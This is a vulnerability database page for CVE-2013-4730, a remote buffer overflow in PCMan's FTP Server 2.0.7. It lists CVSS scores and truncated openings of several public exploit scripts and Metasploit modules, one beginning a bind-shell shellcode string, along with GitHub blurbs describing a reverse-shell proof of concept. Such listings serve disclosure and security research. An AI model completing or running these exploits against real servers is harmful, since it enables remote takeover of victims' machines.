10
CVSSv2

CVE-2013-4730

Published: 15/05/2014 Updated: 31/12/2016
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

Buffer overflow in PCMan's FTP Server 2.0.7 allows remote malicious users to execute arbitrary code via a long string in a USER command.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

pcman\\'s ftp server project pcman\\'s ftp server 2.0.7

Exploits

# Exploit Title: PCMAN FTP 207 Long Command Buffer Overflow (unauthenticated) # Date: Feb 19, 2014 # Exploit Author: Sumit # Version: 207 # Tested on: Windows XP Professional SP3 # Description: Buffer overflow is triggered upon sending long string to PCMAN FTP 207 in place of command # import socket import datetime """ You have to take into ac ...
#!/usr/bin/env python import signal from time import sleep from socket import * from sys import exit, exc_info # # Title************************PCMan FTP Server v207 Remote Root Shell Exploit - USER Command # Discovered and Reported******June 2013 # Discovered/Exploited By******Jacob Holcomb/Gimppy, Security Analyst @ Independent Security Eval ...
# Exploit Title: PCMAN FTP 207 CWD Command Buffer Overflow # Date: Jan 25,2014 # Exploit Author: Mahmod Mahajna (Mahy) # Version: 207 # Tested on: Windows 7 sp1 x64 (english) # Email: mdofo123@gmailcom import socket as s from sys import argv # if(len(argv) != 4): print "USAGE: %s host <user> <password>" % argv[0] exit(1) els ...
#!/usr/bin/python27 # -*- coding: utf-8 -*- """ PCMAN FTPD 207 PASS Command Buffer Overflow Author: Ottomatik Date: 2013-07-31 Software : PCMAN FTPD Version : 207 Tested On: Windows 7 SP1 - French; Description: * The PASS Command is vulnerable to a buffer overflow; * Other commads may be vulnerable; """ # Modules import; import sock ...
# Title: PCMan FTP Server v207 Buffer Overflow - MKD Command # Date : 12/02/2015 # Author: R-73eN # Software: PCMan FTP Server v207 # Tested On Windows Xp SP3 import socket #348 Bytes Bind Shell Port TCP/4444 shellcode = "\xdb\xcc\xba\x40\xb6\x7d\xba\xd9\x74\x24\xf4\x58\x29\xc9" shellcode += "\xb1\x50\x31\x50\x18\x03\x50\x18\x83\xe8\xbc\x54\ ...
#!/usr/bin/python # Exploit Title: PCMAN FTP 207 STOR Command - buffer overflow # Date: 18 Agosto 2013 # Exploit Author: Christian (Polunchis) Ramirez intrusionlabsorg # Contact: polunchis@intrusionlabsorg # Version: PCMAN FTP 207 STOR Command # Tested on: Windows XP SP3, Spanish # Thanks:To GOD for giving me wisdom # # Descrip ...
#!/usr/bin/python # Exploit Title: PCMan's FTP Server v20 - RENAME command remote buffer overflow # Date: 29 Aug 2015 # Exploit Author: Koby # Vendor Homepage: pcmanopenfoundryorg/ # Software Link: wwwexploit-dbcom/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan7z # Version: 207 # Tested on: Windows XP SP3 import socket import ...
#!/usr/bin/python # # #################################################################### # # Exploit Title: PCMan's FTP Server 20 Remote Buffer Overflow Exploit # Date: 2013/6/26 # Exploit Author: Chako # Vendor Homepage: pcmanopenfoundryorg/ # Software Download Link: filessecureservernet/1sMltFOsytirTG # Version: 20 # Tested ...
# Exploit-DB Note: Ret needs adjustment for Windows XP SP3 English ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions Please see the Metasploit # web site for more information on licensing and terms of use # metasploitcom/ ## require 'msf/core' class Metasploit3 < ...
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions Please see the Metasploit # web site for more information on licensing and terms of use # metasploitcom/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit:: ...
# Exploit Title: PCMAN FTP 207 ABOR Command Buffer Overflow # Date: Jan 25,2014 # Exploit Author: Mahmod Mahajna (Mahy) # Version: 207 # Tested on: Windows 7 sp1 x64 (english) # Email: mdofo123@gmailcom import socket as s from sys import argv # if(len(argv) != 4): print "USAGE: %s host <user> <password>" % argv[0] exit(1) el ...

Github Repositories

PCMan is win32 application that is vulnerable to buffer overflow attack

Hacking-in-to-PCMan-ftp-server PCMan is win32 application that is vulnerable to buffer overflow attack PCMan FTP Server 207 has a public vulnerability CVE-2013-4730 based on buffer overflow that is allowed remote attacker to execute arbitrary code via client command This is a stack based buffer overflow vulnerability In order to preform a buffer overflow, we need to use sp

A very simple buffer overflow using CVE-2013-4730 against PCman's FTP server

PCman FTP Server Buffer overflow and Remote Code Execution [CVE-2013-4730] A very simple buffer overflow using CVE-2013-4730 against PCman's FTP server v207 How it works? That easy BoF overwrite the buffer and execute the shellcode that will connect back (reverse shell) Vuln machines: WindowsXP SP3 running PCman's FTP Server at version 207 launch ~$ python3 PCman